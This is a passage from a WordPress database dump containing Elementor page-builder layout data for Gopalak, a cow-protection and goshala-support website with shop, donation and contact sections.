Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12129,1993,'_elementor_page_assets','a:0:{}'),(12131,1994,'_elementor_edit_mode','builder'),(12132,1994,'_elementor_template_type','wp-page'),(12133,1994,'_elementor_version','3.7.8'),(12134,1994,'_wp_page_template','elementor_canvas'),(12135,1994,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6ac0a\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"a3cc846\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"793c8dc\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"72a7055\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d16d59b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"94e41e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"af9eefd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9631635\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61c526b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4046e16\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"acbd211\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2894738\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"a4c68e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1216c33\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aac0ac3\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"298cd32\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"d121900\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"4a280f6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12136,1994,'_elementor_page_assets','a:0:{}'),(12138,1995,'_elementor_edit_mode','builder'),(12139,1995,'_elementor_template_type','wp-page'),(12140,1995,'_elementor_version','3.7.8'),(12141,1995,'_wp_page_template','elementor_canvas'),(12142,1995,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\